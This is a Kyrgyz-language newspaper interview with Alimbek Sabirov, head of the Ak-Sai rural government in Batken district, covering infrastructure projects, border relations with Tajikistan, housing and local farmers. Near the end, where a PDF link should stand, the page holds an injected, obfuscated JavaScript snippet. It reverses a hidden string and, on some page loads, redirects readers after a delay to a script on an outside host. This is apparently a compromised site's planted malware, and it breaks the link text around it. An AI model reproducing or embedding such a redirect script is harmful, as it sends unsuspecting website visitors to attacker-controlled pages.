Алимбек Сабиров: “Ак-Сай – чыныгы эмгекчил инсандардын айылы”

11-февраль, 2022-ж. / Редакция / Жаңылыктар 56

Баткен районунун Ак-Сай айыл өкмөтү чек арага чектеш өзгөчө стратегиялык аймак. Бул аймакка өзгөчө статус макамы берилген. Облус ичинде өткөрүлгөн сынакта Ак-Сай айыл өкмөтү 2021-жылдын жыйынтыгы менен “Жылдын мыкты айыл өкмөтү” деп табылды. Аймактын социалдык-экономикалык абалы, чек арага чектеш жайгашкандыктан коңшулар менен мамилеси тууралуу Ак-Сай айыл өкмөтүнүн башчысы Алимбек Сабиров менен маек курдук.

Алгач Ак-Сай айыл өкмөтү тууралуу кыскача маалымат берсеңиз?

Ак-Сай айыл өкмөтү – Баткен облусунун эле эмес, өлкө үчүн өзгөчө стратегиялык аймак. Дал ушул аймак аркылуу 200 миңге жакын калк жашаган Лейлек районуна, Сүлүктү шаарына жана Баткен районунун 30 миңден ашык Ак-Татыр, Самаркандек, Ак-Сай айыл аймактарына жол өтсө, Баткен районунун Кара-Бак, Бужум, Дара айыл аймактарына жана Баткен шаарына Төрт-Күл каналы аркылуу суу жеткирилет. Бул аймак Тажикстандын Исфара районуна караган 40 миңдей адам жашаган Ворух анклавы менен да чектешет. Чыр-чатактын чордону болгон Төрт-Көчө, протокол чыры менен белгилүү болгон 275 метр аралык дагы Ак-Сай айыл аймагына кирет. Ак-Сай айыл аймагынын жалпы аянты 3548 гектарды түзөт. Айыл аймактагы 6 билим берүү мекемесинде жалпысынан 94 мугалим 988 окуучуга билим-тарбия берип келет. Аталган айыл аймакта 2247 кожолук, же 8500 калк жашайт. Ак-Сай, Көк-Таш, Үч-Дөбө, Капчыгай, Таш-Тумшук, Миң-Булак айылдарынан турган бул аймак Баткенге берилген өзгөчө статус макамынын бардык жеңилдиктеринен пайдаланышат. Айылдын туруктуу жашоочуларынын пенсиялары 2000 сомго, жөлөкпулдары эки эсеге жогорулатылып, электр энергиясы 50%га жеңилдетилди. Ал эми дарыгерлер, мугалимдер, күч түзүмдөрүнүн кызматкерлеринин айлыгын көтөрүү маселеси да сунушталды.

 Облус ичинде өткөрүлгөн сынакта Ак-Сай айыл өкмөтү «Жылдын мыкты айыл өкмөтү» деп табылды. Сыйлыгыңыздар кут болсун! Кандай критерийлерден улам ушундай сыймыкка татыдыңыздар?

Рахмат! Өткөн жыл чек арадагы жаңжалдарга карабастан биз үчүн ийгиликтүү жыл болду. Бардык көрсөткүчтөрдү камсыз кылдык. Айылыбыздын инфраструктурасы өстү. Өлкө башчысынын колдоосу менен Ак-Сай айыл өкмөтүнө караштуу бардык айылдарыбызга ФАП, мончо, балдар бакчалары, мектептер курулду. Ал эми өткөн жылы болсо 6 млн сомдон ашык инвестициялар тартылып, 13 долбоорду ишке ашырдык. Салыктардын бардык түрү боюнча планыбыз 125%га аткарылды.

 Аймактагы аткарылган иштерге кененирээк токтолуп кетсеңиз?

Биздин аймак чек арада жайгашканы менен көп социалдык көйгөйлөр чечилбей кала берген. Өткөн жылды сөз болуп ишке ашпай келген социалдык маселелерди чечүүчү жыл деп атасак да болот. Өнүгүү программасынын алкагында Ак-Сай айылында таза суу тармактары оңдолуп, Бакай участкасына электр линиясы тартылды. “Ак-Сай жаштары” фонду тарабынан муктаж үй-бүлөнүн үйү толук бүткөрүлүп берилди. Спорттук зал капиталдык оңдоп-түзөөдөн өткөрүлүп, спорттук эмеректер менен камсыздалды. Гараж участкасындагы ички жолдорго шагыл төшөлдү. Маданият үйү, ФАП капиталдык оңдоп-түзөөдөн өттү. Дагы бир муктаж үй-бүлөгө “Ак-Ниет” аманат фонду тарабынан үй курулуп берилди. Жаңы конуштарга электр линиясы тартылды. Таш-Тумшук негизги жана Көк-Таш башталгыч мектептерине видеобайкоо орнотулду. Үч-Дөбө айылына ФАП, көпүрө курулуп, айылга таза суу линиясын тартуу үчүн суу сактагыч курулду. Миң-Булак айылына 63 жана 100 кВт трансформаторлор коюлду. Миң-Булак айылына электр линиясы тартылып, түнкү жарыктандыруу орнотулду. Көк-Таш айылындагы ички жолдор оңдолду. Көк-Таш айылынын Дахма участкасына түнкү жарыктандыруу, видеобайкоо орнотулду. Үч-Дөбө, Таш-Тумшук жана Көк-Таш айылдарындагы жакыр үй-бүлөлөрдүн үйү толук оңдолуп-түзөлдү.

 Сизди “чек арачы өкмөт” деп коюшат экен. Коңшулар менен мамилеңиздер кандай?

Биздин негизги көйгөйлүү маселелерибиз: чек ара, сугат суу, таза суу жана миграция. Кээде коңшу тажик коллегалар менен жолугушуп турабыз. Ак-Сай айыл өкмөтү Баткен районунун чек арада жайгашкан айыл өкмөттөрүнүн бири болгондуктан Баткен райондук мамлекеттик админис-трациясы, райондук мекеме-ишканалардын жетекчилери менен коңшу Тажик Республикасынын Исфара районунун жергиликтүү бийлик өкүлдөрү менен биргеликте 15 жолу расмий жолугушуулар өткөрүлүп, өз ара кызматташтык маселелери талкууланды. Ошондой эле достукту жана ынтымакты бекемдөө максатында маданий иш-чаралар жана тегерек столдор өткөрүлүп турат.

 Калктын турак жай маселесин кандай чечип жатасыздар?

Көп жылдан бери көйгөйгө айланган турак жай маселесин да жеңилдеттик. Бул маселени чечүү үчүн жалпы аянты 149,4 га жер тилкеси трансформацияланып, анын 100 гектарын жарандарга бердик. Кезеги менен дагы беребиз. Бир сөз менен айтканда, калкыбыздын туруктуу жашап калуусу үчүн ар тараптуу шарттарды түзөбүз.

 Бакай участкасындагы жаңы насостук станция ишке берилдиби?

Бакай участкасындагы жаңы насостук станция пайдаланууга берилишин элибиз чыдамсыздык менен күтүүдө. Бул долбоор ишке ашса, кошумча 131 гектар жаңы жерлер өздөштүрүлүп, 225 гектар сууга болгон жерлердин абалы жакшырат. Жалпы наркы 55,0 млн сомдук бул насостук станция жакында пайдаланууга берилет деген үмүттөбүз.

 Ак-Сай – Тамдык жол курулушу бүтүп калдыбы? Бул жол сиздер үчүн өтө маанилүү эмеспи?

Ак-Сай – Тамдык жолунун курулушу республикалык бюджеттин эсебинен 2014-жылы башталган. Азыркы күндө курулуш иштери улантылып, аяктоо стадиясында (2 км калды) турат. Бул жол бүткөрүлсө, ак-сайлыктар Ворух анклавына көз карандысыз жол аркылуу жайыттарды кеңири пайдаланууга мүмкүнчүлүк түзүлөт. Кабарыңыздар бар чыгаар, буга чейин жайыт маселеси боюнча жаз келген сайын жаңжалдар чыгып келген.

Аймактарда айрыкча социалдык маселелерде көйгөйлөр көп эмеспи, алар кандай чечилүүдө?

Ак-Сай айыл аймагына акыркы жылдары өлкө тарабынан өзгөчө көңүл бурулуп, бардык социалдык көйгөйлөр чечилүүдө. Чакан Үч-Дөбө айылынын өзүнө эле заманбап мектеп, балдар бакчасы, кондитердин цех, коомдук мончо бардык шарттары менен бүткөрүлүп, пайдаланууга берилди. Ал эми Көк-Таш айылынын М.Назаров жана О.Боронбаев көчөлөрү Тажик Республикасынын Исфара районунун Майский, Саманен айылдары менен чектешкен аймактар. Аталган аймактын коопсуздугун камсыздоо боюнча Көк-Таш айылдык милиция бөлүмчөсү Тажик Республикасынын Исфара районунун Майский, Саманен, Чоркух, Хожай-Аьоло айылдары жана Ворух анклавы менен чектешкен айылдарын тейлешет. Аларга кошумча КРнын ИИМинин Ички коопсуздук аскер кызматынын 707 бөлүгү ыктыярдуу элдик кошуундар менен биргеликте кайгуул күзөттөрдү жүргүзүп турушат.

Элетти эмгекчи эл көтөрөт. Ак-Сайдан да мыкты фермерлер чыкканын угуп жүрөбүз…

Ак-Сай – чыныгы эмгекчил инсандардын айылы. Бөксө тоолор менен курчалган айылды мисир тутуп жашаган элдин өзгөчө кичи пейилдиги, мекенчилдиги башкалардан өзгөчөлөнүп турат. Негизги кирешесин мал чарбачылыгынан алган Ак-Сайдан Ибрагим Сабиров, Исабек Рустамов, Саатбек Жанжигитов, Точу Амираев, Мидин Калматов, Абдугапар Анаров сыяктуу фермерлер чыгып, бүгүнкү күндө тыбыт багытындагы эчки чарбачылыгын өнүктүрүүдө. Ал эми айымдардын арасынан чыккан Сайрам Зулпукарова менен Айсалкын Абытованын эмгегин өзгөчө баалоого татыйт. 600дөн ашык ири мүйүздүү малдарды өстүрүп, чакан айылда чоң киреше тапкан Сайрам Зулпукарова менен ири тоок ферма ачып, бүтүндөй Баткен районун жумуртка менен камсыз кылып келген Айсалкын Абытованын эмгеги мамлекеттик сыйлыкка татыктуу.

$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}too.kg/wp-content/uploads/2022/02/04_02.pdf»>«Эркин-Тоо» гезити №16-17
2022-жылдын 11-февралы

Адылбек АКМАТОВ,

Гүлчехра ТАЖИБАЕВА

11-февраль, 2022-ж. / Редакция / Жаңылыктар 56
Бөлүшүү: Telegram WhatsApp X